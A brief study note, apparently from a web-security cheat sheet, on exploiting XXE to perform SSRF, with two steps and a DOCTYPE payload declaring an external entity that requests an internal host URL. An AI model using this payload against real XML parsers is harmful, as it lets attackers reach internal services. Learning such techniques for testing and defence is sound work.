289 B
289 B
Exploiting XXE to Perform SSRF Attacks
- Need to do the following:
- Define an external XML entity using the URL you want to target
- Use the defined entity within a data value
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM " http://internal.vulnerable-
website.com/"> ]>